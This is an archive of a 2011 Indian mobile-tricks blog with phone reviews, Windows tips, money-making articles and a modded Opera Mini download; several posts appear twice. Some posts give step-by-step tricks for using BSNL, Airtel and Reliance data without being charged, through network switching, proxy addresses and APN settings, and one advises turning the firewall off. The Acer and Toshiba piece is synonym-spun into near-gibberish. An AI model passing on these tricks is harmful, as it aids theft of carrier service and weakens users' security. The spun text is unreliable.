SYMBIAN 8.1..,.9.1.,and.9.2 phones i.e n70 and n72...and all s60v3 phones Only..

not in symbian 6,7,8 phones

Sunday, January 23, 2011

Opera Mini 5.1 Mz Menu DOCOMO

Name: Opera_Mini_5.1_Advanced_MZ_Menu_Docomo_2011Mod_By_allindiantricks.blogspot.Com.jar

Size: 350.08 KB

Added: 24.1.2011

Last Download By: preetham12

Download: 11/11 x

[Download]

LG Optimus Me Android P350- Review


LG Optimus Me LG P350 is new cheap Android mobile phone which offers latest Google Android OS v2.3 (Gingerbread), touchscreen display and faster 3G connectivity

LG Optimus Me LG P350 is new cheap Android mobile phone which offers latest Google Android OS v2.3 (Gingerbread), touchscreen display and faster 3G connectivity @ affordable price in India. LG P350 mobile features Wi-Fi, GPS, 3.5mm headphone Jack and many free apps. LG has once again turned to Facebook to unveil a smartphone, and just like that we have another Optimus branded handset that appears as if it will soon be announced. The latest is the LG Optimus Me P350 and this reveal comes in the form of a few official images and a few basic and still rumored specs.Moving on though, what we can tell you in terms of specs includes that the Optimus Me P350 will feature a 320 x 480 pixel display (guessed to be at 3.2 inches) along with a 3 megapixel camera, 1500 mAh Li-Ion battery, Wi-Fi, Bluetooth, GPS, 140MB internal storage and a microSD card slot.That said, the specs are rather light and the images tell the real story here. Of course, the little that we do know of the specs ensure one thing — this is not a high end device. Yup, you are looking at another mid-range Optimus and at present we are unsure when and where this will come available. Not to mention, how much it will end up costing.However, LG notes that the handset will feature a 3-megapixel camera, Wi-Fi, GPS, 1,500 mAh battery, 140MB of internal storage, microSD card slot, and will be available in a variety of colors to choose from. So far, the LG Optimus Me is looking to be a successor to the Optimus One, but it's hard to say for sure since the Optimus One is still relatively new. Nonetheless, expect more information around MWC.

LG Optimus Me Android P350- Review


LG Optimus Me LG P350 is new cheap Android mobile phone which offers latest Google Android OS v2.3 (Gingerbread), touchscreen display and faster 3G connectivity

LG Optimus Me LG P350 is new cheap Android mobile phone which offers latest Google Android OS v2.3 (Gingerbread), touchscreen display and faster 3G connectivity @ affordable price in India. LG P350 mobile features Wi-Fi, GPS, 3.5mm headphone Jack and many free apps. LG has once again turned to Facebook to unveil a smartphone, and just like that we have another Optimus branded handset that appears as if it will soon be announced. The latest is the LG Optimus Me P350 and this reveal comes in the form of a few official images and a few basic and still rumored specs.Moving on though, what we can tell you in terms of specs includes that the Optimus Me P350 will feature a 320 x 480 pixel display (guessed to be at 3.2 inches) along with a 3 megapixel camera, 1500 mAh Li-Ion battery, Wi-Fi, Bluetooth, GPS, 140MB internal storage and a microSD card slot.That said, the specs are rather light and the images tell the real story here. Of course, the little that we do know of the specs ensure one thing — this is not a high end device. Yup, you are looking at another mid-range Optimus and at present we are unsure when and where this will come available. Not to mention, how much it will end up costing.However, LG notes that the handset will feature a 3-megapixel camera, Wi-Fi, GPS, 1,500 mAh battery, 140MB of internal storage, microSD card slot, and will be available in a variety of colors to choose from. So far, the LG Optimus Me is looking to be a successor to the Optimus One, but it's hard to say for sure since the Optimus One is still relatively new. Nonetheless, expect more information around MWC.

Thursday, January 20, 2011

IMPROVE XP SHUTDOWN SPEED

1.This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.

Go to Start then select Run

Type 'Regedit' and click ok

Find 'HKEY_CURRENT_USERControl PanelDesktop'

Select 'WaitToKillAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Now select 'HungAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'



"mentioned trick try this on own risk"




Set a password for the ms-excel files

1.To set a password for ms-excel file:- create a sheet and save it.Go to menu bar>tools option.click on security tab.select Password to open,modify select password.type confirmation password again.Thats it now u can keep a password for every ms-excel file.



$-Make Ur Computer Speak-$

1.hi guys, this is a cool trick to make ur computer speak whatever u type. Just type 'control speech' in 'run'. U have done type whatever and click on 'preview voice'. Enjoy and post ur comments!



How to make ur Desktop Icons Transparent

1.Go to Control Panel >

System,

> Advanced >

Performance

area > Settings

button Visual

Effects tab "Use

drop

shadows for icon

labels on

the Desktop"




Make your phone useless when stolen!

1.There is a simple way of making lost or stolen mobiles useless to thieves and the phone companies know about it, but keep it quiet. To check your mobile phone's serial number, key in the following on your phone: star-hash-zero-six- hash ( * # 0 6 # ) and a fifteen digit code will appear on the screen. This is unique to your handset. Write it down and keep it safe. Should your mobile phone get stolen, you can phone your service provider and give them this code. They will then be able to block your handset, so even if the thief changes the sim card, your phone will be totally useless. You probably won't get your phone back, but at lease you know that whoever stole it can't use / sell it either. If everybody did this, there would be no point in stealing mobile phone-(-)



-get call from ur own no.-

1.hi guys, now u can get call from ur own no. Just dial this no. *140*1600# wait 4

3sec. U will get call from ur own no. Working in s40 devices. Enjoy and post ur comments.

Monday, January 10, 2011

Making Money Without A Website


People email me every week saying that they don't want to retire with the money they make online, they just want to make some extra money each month. And, they'd like to do it without spending any money up front and without a website. Does that sound like you? If it does, this may be the perfect article for you.

The way to make extra money online without a website is through the use of revenue sharing sites. A revenue sharing site works very much like a traditional article directory. Directories are sites where you can submit articles. The directories then post your articles and allow visitors to use them. People access articles at these sites for research, information, or for content on the websites. You are not paid to place articles and, normally, visitors do not pay to view or use them. The directories make money by posting advertisements along with your articles. These directories keep all of the money that the advertising brings in.

Revenue sharing sites work in a similar manner. You submit articles to these sites just as you would to a traditional article directory. The site then posts your articles and allows visitors to use them. People access articles at these sites for research, information, or for content on the websites. And, just like the traditional directories, you are not paid to place articles and visitors do not pay to view or use them. The directories make money by posting advertisements along with your articles. Here's the difference, instead of keeping all of the money that they earn, they share a portion of their profits with the people who submit the articles. Some sites give you half of the money that they earn, others give you 80%, and a few give you 100%. It depends on the site and their policies.

In order to participate with the revenue sharing sites, you must register with Adsense and get a publisher's Identification number.

How much money can you make? It depends on the number of articles you submit. If you intend to submit just one article, then forget about it. You'll probably just make a few cents. The key to making money with the revenue sharing sites is to submit articles on a regular basis to a number of the sites. You can submit the same article to several different sites. So, if you've written 30 articles in the past month or two, why not register with Adsense, submit all them to a few revenue sharing sites and make some money, even if you don't have a website.
Most Good Revenue Sharing Site's List:D

Making Money Without A Website


People email me every week saying that they don't want to retire with the money they make online, they just want to make some extra money each month. And, they'd like to do it without spending any money up front and without a website. Does that sound like you? If it does, this may be the perfect article for you.

The way to make extra money online without a website is through the use of revenue sharing sites. A revenue sharing site works very much like a traditional article directory. Directories are sites where you can submit articles. The directories then post your articles and allow visitors to use them. People access articles at these sites for research, information, or for content on the websites. You are not paid to place articles and, normally, visitors do not pay to view or use them. The directories make money by posting advertisements along with your articles. These directories keep all of the money that the advertising brings in.

Revenue sharing sites work in a similar manner. You submit articles to these sites just as you would to a traditional article directory. The site then posts your articles and allows visitors to use them. People access articles at these sites for research, information, or for content on the websites. And, just like the traditional directories, you are not paid to place articles and visitors do not pay to view or use them. The directories make money by posting advertisements along with your articles. Here's the difference, instead of keeping all of the money that they earn, they share a portion of their profits with the people who submit the articles. Some sites give you half of the money that they earn, others give you 80%, and a few give you 100%. It depends on the site and their policies.

In order to participate with the revenue sharing sites, you must register with Adsense and get a publisher's Identification number.

How much money can you make? It depends on the number of articles you submit. If you intend to submit just one article, then forget about it. You'll probably just make a few cents. The key to making money with the revenue sharing sites is to submit articles on a regular basis to a number of the sites. You can submit the same article to several different sites. So, if you've written 30 articles in the past month or two, why not register with Adsense, submit all them to a few revenue sharing sites and make some money, even if you don't have a website.
Most Good Revenue Sharing Site's List:D

How To Make Money Online From Revenue Sharing Sites


If you have been searching online for different money making opportunities to make money online then you might definitely come across revenue sharing sites which share a part of their advertising revenue with its registered users for their activities on the site. Well first thing which you need to know is why revenue sharing sites actually share revenue with you? Well you may already know this answer but for all those who are not aware of this revenue sharing sites share revenue with you because they get fresh content from its users and since it gets updated several times a day by different users of the site the search engine spiders crawl this site more often than any other site and thus giving it a higher ranking over other sites and that's the reason you will actually see that most of the sites which allows users to write content on their site enjoys maximum search engine traffic. Now as they get huge traffic from search engines they also generate huge revenue from their sponsors and in most of the cases they share their site's Adsense revenue with the users.

Now that you know why revenue sharing sites share revenue with you its time to learn how to make money from these sites, the first thing you need to do in order start earning from these sites is sign up for an Adsense account because almost all the sites share their Adsense revenue with you. One of the benefits of signing up with revenue sharing sites is you can write about anything you want to, unlike running a website or a blog where in most of the cases you need to stick to a specific topic, in these programs you are confined to that because each time you submit a post to these sites its like creating a new blog altogether so this gives you the liberty of changing the topic of your post as many times as you want. This way you can keep your content fresh and updated.

If you sign up with only one revenue sharing site then it will take ages for you to get your first paycheck from Google Adsense. So, the simplest way of maximizing your earnings is signing up with several revenue sharing sites at once and posting your articles to those sites, so that your posts will get maximum readers and hence increasing your earnings from these sites.

How To Make Money Online From Revenue Sharing Sites


If you have been searching online for different money making opportunities to make money online then you might definitely come across revenue sharing sites which share a part of their advertising revenue with its registered users for their activities on the site. Well first thing which you need to know is why revenue sharing sites actually share revenue with you? Well you may already know this answer but for all those who are not aware of this revenue sharing sites share revenue with you because they get fresh content from its users and since it gets updated several times a day by different users of the site the search engine spiders crawl this site more often than any other site and thus giving it a higher ranking over other sites and that's the reason you will actually see that most of the sites which allows users to write content on their site enjoys maximum search engine traffic. Now as they get huge traffic from search engines they also generate huge revenue from their sponsors and in most of the cases they share their site's Adsense revenue with the users.

Now that you know why revenue sharing sites share revenue with you its time to learn how to make money from these sites, the first thing you need to do in order start earning from these sites is sign up for an Adsense account because almost all the sites share their Adsense revenue with you. One of the benefits of signing up with revenue sharing sites is you can write about anything you want to, unlike running a website or a blog where in most of the cases you need to stick to a specific topic, in these programs you are confined to that because each time you submit a post to these sites its like creating a new blog altogether so this gives you the liberty of changing the topic of your post as many times as you want. This way you can keep your content fresh and updated.

If you sign up with only one revenue sharing site then it will take ages for you to get your first paycheck from Google Adsense. So, the simplest way of maximizing your earnings is signing up with several revenue sharing sites at once and posting your articles to those sites, so that your posts will get maximum readers and hence increasing your earnings from these sites.

Acer Ethos And Toshiba Satellite L450 2011

Acer TravelMate
IT Pro Portal letters on the most recent barrage of Acer’s touch-screen laptop Ethos. Equipped with a 15.6-inch or a 18.4-inch affectation screen, Ethos uses an able touchpad to ascendancy a host of multimedia appearance including sound, drag amid music advance and cross online capacity like YouTube, Facebook and Flickr.

It comes with the Arcade Deluxecomputer application for managing multimedia capacity with the touchpad controls. It has a able processor Core i5 or the Core i7 with up to 16GB DDR3 memory, and appropriately performs alluringly in agreement of abstracts processing and editing.

Nevertheless, affordability is an affair for abounding users, as the adaptation with 4GB RAM and a 320 GB adamantine deejay comes at a whopping amount tag of £1100.
If you are attractive for a laptop advancement at a added affordable price, Toshiba has launched a widescreen laptop which combines achievement with affordability. According to the most recent analysis by ITPro Portal, Toshiba Satellite L450 appearance a 15.6-inch Tru Brite Crystal Clear affectation to cede added accuracy and contrast.

Installed with the Microsoft Windows 7 Home Premium, the laptop appearance a added good online experience, with a congenital web camera that utilises face acceptance technology, enabling users to booty stills, video clips and audio recordings, and comes with a microphone for online chats.
Toshiba Satellite L450 is additionally installed with advancedcomputer application that creates a countersign by digitally mapping out your facial features, to accommodate a abundant college akin of aegis and alienated the risks of accepting your countersign login afraid by the others.

Geared appear connected upgrades in portability, wireless connectivity and aerial performance, laptops and Netbooks are acceptable added basal as anytime as users backpack them about wherever they go, alike back they are on leisure trips. This trend makes laptop allowance awning a added advantageous advance as the accident of theft, adventitious breakdown or accident access with aerial abundance carriageable use. :D

Acer Ethos And Toshiba Satellite L450 2011

Acer TravelMate
IT Pro Portal letters on the most recent barrage of Acer’s touch-screen laptop Ethos. Equipped with a 15.6-inch or a 18.4-inch affectation screen, Ethos uses an able touchpad to ascendancy a host of multimedia appearance including sound, drag amid music advance and cross online capacity like YouTube, Facebook and Flickr.

It comes with the Arcade Deluxecomputer application for managing multimedia capacity with the touchpad controls. It has a able processor Core i5 or the Core i7 with up to 16GB DDR3 memory, and appropriately performs alluringly in agreement of abstracts processing and editing.

Nevertheless, affordability is an affair for abounding users, as the adaptation with 4GB RAM and a 320 GB adamantine deejay comes at a whopping amount tag of £1100.
If you are attractive for a laptop advancement at a added affordable price, Toshiba has launched a widescreen laptop which combines achievement with affordability. According to the most recent analysis by ITPro Portal, Toshiba Satellite L450 appearance a 15.6-inch Tru Brite Crystal Clear affectation to cede added accuracy and contrast.

Installed with the Microsoft Windows 7 Home Premium, the laptop appearance a added good online experience, with a congenital web camera that utilises face acceptance technology, enabling users to booty stills, video clips and audio recordings, and comes with a microphone for online chats.
Toshiba Satellite L450 is additionally installed with advancedcomputer application that creates a countersign by digitally mapping out your facial features, to accommodate a abundant college akin of aegis and alienated the risks of accepting your countersign login afraid by the others.

Geared appear connected upgrades in portability, wireless connectivity and aerial performance, laptops and Netbooks are acceptable added basal as anytime as users backpack them about wherever they go, alike back they are on leisure trips. This trend makes laptop allowance awning a added advantageous advance as the accident of theft, adventitious breakdown or accident access with aerial abundance carriageable use. :D

Friday, January 7, 2011

reliance proxifier trick

1.Awesome speed



75.125.147.82:3128/?id=jCustomerWAPProv& (TAIWAN transparent)use dis in proxifier and also set ur mozilla browser settings to 10.239.221.22 & port 8080 apn rcommms and also keep windows firewall off dats all,nw enjoy plz dnt forget to hit thanxx if u lyk my work



more proxies 4 u 210.212.164.162:3128

213.151.33.57:3128

84.54.160.34:8080

76.249.179.98:3128

196.216.70.189:80

202.148.25.154:8080 188.40.158.236:3128

91.121.60.204:3128 france t

207.42.176.65:3128 honduras t





Unlimited resume download(latest update)

1.Paste any download link(whtever may be the size) in german-proxy.de address bar using opera mini. You will see that file generally having name fnoreferer is available for download ( size shown may be zero,no problem ). Copy the link from the address bar to uc browser new download option and change http://www.german-proxy.de to o.facebook.com Rest of the address will remain same. Press save . Download will start.

But you have to use settings as-



proxy add:- german-proxy.de

apn:-airtelgprs.com

port 80



you can download file of any size

but it only works with official uc browser not with any modded uc browser



u can also use wap.indiatimes.com instead of o.facebook.com





dont set block size to 1mb. Use 600 kb block size for faster speed(in uc options)

100% working





update:-

If any1 is facing problem with dwnlding than download uc handler from Downloads-Handlers.

Now in the handler menu set block size value 1000000. Now in uc option set blocksize to handler menu. That's all.

Speed may be slow during day but full in morning



Bsnl Pc Trick For N70 & Others

BSNL3G PC TRICK FOR N70 Users(or other which reboots on network change) users in pc:-

finally i have developed the trick to use bsnl3g in pc with n70.I know that by pressing 'yes' and 'no' tabs at the same time can change ur network mode from gsm to umts without rebooting only in n73...but this doesn't happens in n70.So no need of getting upset or flashing ur phone for umts..And by this trick u can use bsnl2g sim with 3g speed(40-70 kbps).



So the trick begins:-

ÀRequirements: pc suite installed on pc,n70 phone,data cable. ÀTrick:

1.Connect ur n70 with data cable



2.Make manual setting in pc suite with apn-bsnlnet but do not connect to internet now.



3.Now in ur n70,Connect any light site like wap.google.com on ur mobile's default browser with bsnlnet apn.It will open.Now go to settings>network.Press 'manual' in operator selection..After few seconds it will show all networks in ur area.Select any operator other than bsnl, like airtel india.It will show error and ur 3g sign will be lost.



4.Now the real trick is here.Press'Connect to internet' tab in pc suite and 'bsnl3g home network' in ur n70 at the sametime.Both will connect at same time in few seconds and show double connection sign.Go to default browser in n70 and press 'reload' and ur homepage will be reloaded...1or 2 paise will be deducted. Thats all and now ur bsnl3g is hacked and u can surf and download freely in pc.For precaution take care if ur balance is not deducting.Balance should be >50 and u should be in 3g area.

This trick is absolutely discovered by me and plz dont copy paste in other Sites

Bsnl Pc Trick For N70,N73

Bsnl 3g trick:

1.For n70,n73-

It is similar to Old tricks,but there was problem that on 1st connection balance not deducted.So i modified it..So here is trick for free bsnl3g:

Ok..First u sh'd have a 3g set(or n70,n73)and a 2g bsnl sim.3g sign shd be coming on ur phone(trick given in forum for getting 3g sig).Now make homepage in ur default browser with wap.cellone.in and apn-bsnlnet.Now check whether it is opening on pressing '0' key.Now trick starts:

Go to settings>network>manual.



It 'll show all the networks in ur area.Select 'india airtel'.It will show 'no access' >>then select 'cellone'.It 'll be selected and in 2 sec press'0' to open ur homepage in default browser.It 'll cut 0.01p of ur balance and ur 3g is hacked.Dont exit that browser and browse in other softwares like ucweb,opmini etc.If balance not deducted do the same procedure without exiting that browser and after pressing 0 reload the page.Now it 'll surely deduct 0.02 p.Thus ur 3g is free.



2.For higher sets-for higher sets having umts and gsm option: first select gsm in network settings and browse any site through default browser.Then without exiting by clicking menu come out..And again go to network settings and select umts and open any site in default browser ,0.1p will deduct and now come out through menu key and browse in any other browser for absolutely free. 

Tuesday, January 4, 2011

airtel high speed net by default browser

1.hi frndz, its a new

trick for default

browser, with this u

can download big files

also..... H.P.-

http://202.87.41.147/

cgi-bin/cgiproxy/nph-

proxy.pl/http/

IP-66.116.196.251

port-80 apn-

airtelgprs.com . Try

this. U can use it with

opera handler also....

Costom http ser.-

http://202.87.41.147/

cgi-bin/cgiproxy/nph-

proxy.pl/010110/

http/

server4.operamini.com:80/

socket ser.-

server4.operamini.com:1080

front que.-

202.87.41.147/cgi-

bin/cgiproxy/nph-

proxy.pl/010110/

http/ its done. And u

can download .jar files

also with this opera

trick. Enjoy & post ur

experience.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Hostgator Discount Code